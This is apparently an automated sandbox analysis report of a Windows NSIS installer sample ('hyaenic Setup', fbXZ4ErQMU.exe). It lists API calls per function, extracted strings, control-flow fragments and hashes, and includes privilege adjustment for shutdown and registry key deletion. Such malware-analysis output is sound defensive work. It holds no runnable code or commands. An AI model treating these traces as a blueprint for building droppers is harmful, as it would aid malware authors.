                                                          • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                                                          • OleInitialize.OLE32(00000000), ref: 004033E9
                                                          • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                                                          • GetCommandLineA.KERNEL32(hyaenic Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\fbXZ4ErQMU.exe",00000020,"C:\Users\user\Desktop\fbXZ4ErQMU.exe",00000000,?,00000007,00000009,0000000B), ref: 00403456
                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                                                          • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                                                            • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                            • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                            • Part of subcall function 0040390A: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,75A53410), ref: 004039FA
                                                            • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                            • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                            • Part of subcall function 0040390A: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
                                                            • Part of subcall function 0040390A: RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                            • Part of subcall function 00403830: CloseHandle.KERNEL32(000002E0,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                          • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                                                          • ExitProcess.KERNEL32 ref: 00403688
                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                          • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
                                                          • ExitProcess.KERNEL32 ref: 0040382A
                                                            • Part of subcall function 00405813: MessageBoxIndirectA.USER32(0040A218), ref: 0040586E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                          • String ID: "$"C:\Users\user\Desktop\fbXZ4ErQMU.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\fbXZ4ErQMU.exe$C:\Users\user\tranchet$C:\Users\user\tranchet\Trykmaalere$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$hyaenic Setup$~nsu
                                                          • API String ID: 3776617018-2629657530
                                                          APIs
                                                            • Part of subcall function 70051215: GlobalAlloc.KERNEL32(00000040,70051233,?,700512CF,-7005404B,700511AB,-000000A0), ref: 7005121D
                                                          • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 70051BC4
                                                          • lstrcpyA.KERNEL32(00000008,?), ref: 70051C0C
                                                          • lstrcpyA.KERNEL32(00000408,?), ref: 70051C16
                                                          • GlobalFree.KERNEL32(00000000), ref: 70051C29
                                                          • GlobalFree.KERNEL32(?), ref: 70051D09
                                                          • GlobalFree.KERNEL32(?), ref: 70051D0E
                                                          • GlobalFree.KERNEL32(?), ref: 70051D13
                                                          • GlobalFree.KERNEL32(00000000), ref: 70051EFA
                                                          • lstrcpyA.KERNEL32(?,?), ref: 70052098
                                                          • GetModuleHandleA.KERNEL32(00000008), ref: 70052114
                                                          • LoadLibraryA.KERNEL32(00000008), ref: 70052125
                                                          • GetProcAddress.KERNEL32(?,?), ref: 7005217E
                                                          • lstrlenA.KERNEL32(00000408), ref: 70052198
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53321356153.0000000070051000.00000020.00000001.01000000.00000005.sdmp, Offset: 70050000, based on PE: true
                                                          • Associated: 00000000.00000002.53321293003.0000000070050000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000000.00000002.53321420725.0000000070053000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000000.00000002.53321477933.0000000070055000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_70050000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                          • String ID:
                                                          • API String ID: 245916457-0

                                                          Control-flow Graph

                                                          [Control-flow graph of the function at 004058BF; graph image not preserved. Legend: Executed / Not Executed]
                                                          APIs
                                                          • DeleteFileA.KERNELBASE(?,?,75A53410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
                                                          • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,75A53410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
                                                          • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,75A53410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
                                                          • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,75A53410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
                                                          • FindFirstFileA.KERNELBASE(0042B898,?,?,?,0040A014,?,0042B898,?,?,75A53410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                                                          • FindClose.KERNEL32(00000000), ref: 00405A26
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
                                                          • "C:\Users\user\Desktop\fbXZ4ErQMU.exe", xrefs: 004058BF
                                                          • \*.*, xrefs: 0040592A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\user\Desktop\fbXZ4ErQMU.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                          • API String ID: 2035342205-948675963
                                                          APIs
                                                          • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                          Strings
                                                          • C:\Users\user\tranchet\Trykmaalere, xrefs: 00402230
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                          • String ID: C:\Users\user\tranchet\Trykmaalere
                                                          • API String ID: 123533781-2736763094
                                                          APIs
                                                          • FindFirstFileA.KERNELBASE(75A53410,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,75A53410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75A53410,C:\Users\user\AppData\Local\Temp\), ref: 00406476
                                                          • FindClose.KERNELBASE(00000000), ref: 00406482
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          APIs
                                                          • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 004027B0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0

                                                          Control-flow Graph

                                                          [Control-flow graph of the function at 0040390A; graph image not preserved. Legend: Executed / Not Executed]
                                                          APIs
                                                            • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                            • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                          • lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,75A53410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\fbXZ4ErQMU.exe",00000000), ref: 00403985
                                                          • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,75A53410), ref: 004039FA
                                                          • lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                          • GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
                                                            • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                          • RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                                                          • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AEB
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBC0), ref: 00403B4D
                                                          • GetClassInfoA.USER32(00000000,RichEdit,0042EBC0), ref: 00403B5A
                                                          • RegisterClassA.USER32(0042EBC0), ref: 00403B63
                                                          • DialogBoxParamA.USER32(?,00000000,00403CA7,00000000), ref: 00403B82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\Desktop\fbXZ4ErQMU.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\tranchet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                          • API String ID: 1975747703-3938786335

                                                          Control-flow Graph

                                                          [Control-flow graph of the function at 00402EA1; graph image not preserved. Legend: Executed / Not Executed]
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402EB2
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\fbXZ4ErQMU.exe,00000400), ref: 00402ECE
                                                            • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\fbXZ4ErQMU.exe,80000000,00000003), ref: 00405C94
                                                            • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                          • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fbXZ4ErQMU.exe,C:\Users\user\Desktop\fbXZ4ErQMU.exe,80000000,00000003), ref: 00402F1A
                                                          • GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00403050
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: "C:\Users\user\Desktop\fbXZ4ErQMU.exe"$@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\fbXZ4ErQMU.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                          • API String ID: 2803837635-2421357064
                                                          • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                          • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                                                          • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                          • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D

                                                          Control-flow Graph (first node 40618a-406195; graph not reproduced)
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004062B5
                                                          • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                                                          • SHGetSpecialFolderLocation.SHELL32(00405256,75A523A0,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                                                          • SHGetPathFromIDListA.SHELL32(75A523A0,Call), ref: 00406312
                                                          • CoTaskMemFree.OLE32(75A523A0), ref: 0040631E
                                                          • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                          • lstrlenA.KERNEL32(Call,?,0042A070,00000000,00405256,0042A070,00000000,00000000,00424248,75A523A0), ref: 00406394
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                          • String ID: /!s$Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 717251189-3905095102
                                                          • Opcode ID: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                          • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                                                          • Opcode Fuzzy Hash: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                          • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E

                                                          Control-flow Graph (first node 401759-40177c; graph not reproduced)
                                                          APIs
                                                          • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,00000031), ref: 00401798
                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,00000031), ref: 004017C2
                                                            • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,hyaenic Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,75A523A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,75A523A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                            • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,75A523A0), ref: 0040527A
                                                            • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp$C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp\System.dll$C:\Users\user\tranchet\Trykmaalere$Call
                                                          • API String ID: 1941528284-414672722
                                                          • Opcode ID: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                          • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                                                          • Opcode Fuzzy Hash: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                          • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D

                                                          Control-flow Graph (first node 4030d8-4030ec; graph not reproduced)
                                                          Similarity
                                                          • API ID: CountTick$wsprintf
                                                          • String ID: ... %d%%$HBB
                                                          • API String ID: 551687249-372310663
                                                          • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                          • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                                                          • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                          • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD

                                                          Control-flow Graph

                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401E38
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                          • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID: Calibri
                                                          • API String ID: 3808545654-1409258342
                                                          • Opcode ID: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
                                                          • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
                                                          • Opcode Fuzzy Hash: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
                                                          • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C

                                                          Control-flow Graph (first node 4056e4-40572f; graph not reproduced)
                                                          APIs
                                                          • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                          • GetLastError.KERNEL32 ref: 0040573B
                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                          • GetLastError.KERNEL32 ref: 0040575A
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
                                                          • C:\Users\user\Desktop, xrefs: 004056E4
                                                          Similarity
                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                          • API String ID: 3449924974-26219170
                                                          • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                          • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                                                          • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                          • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9

                                                          Control-flow Graph (first node 406492-4064b2; graph not reproduced)
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                          • wsprintfA.USER32 ref: 004064E2
                                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%s.dll$UXTHEME$\

                                                          Control-flow Graph

                                                          control_flow_graph 783 405cbf-405cc9 784 405cca-405cf5 GetTickCount GetTempFileNameA 783->784 785 405d04-405d06 784->785 786 405cf7-405cf9 784->786 788 405cfe-405d01 785->788 786->784 787 405cfb 786->787 787->788
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405CD3
                                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
                                                          • nsa, xrefs: 00405CCA
                                                          • "C:\Users\user\Desktop\fbXZ4ErQMU.exe", xrefs: 00405CBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: "C:\Users\user\Desktop\fbXZ4ErQMU.exe"$C:\Users\user\AppData\Local\Temp\$nsa

                                                          Control-flow Graph

                                                          control_flow_graph 789 402cd0-402cf9 call 405f7d 791 402cfe-402d02 789->791 792 402db3-402db7 791->792 793 402d08-402d0c 791->793 794 402d31-402d44 793->794 795 402d0e-402d2f RegEnumValueA 793->795 797 402d6d-402d74 RegEnumKeyA 794->797 795->794 796 402d98-402da6 RegCloseKey 795->796 796->792 798 402d46-402d48 797->798 799 402d76-402d88 RegCloseKey call 406500 797->799 798->796 801 402d4a-402d5e call 402cd0 798->801 804 402da8-402dae 799->804 805 402d8a-402d96 RegDeleteKeyA 799->805 801->799 807 402d60-402d6c 801->807 804->792 805->792 807->797
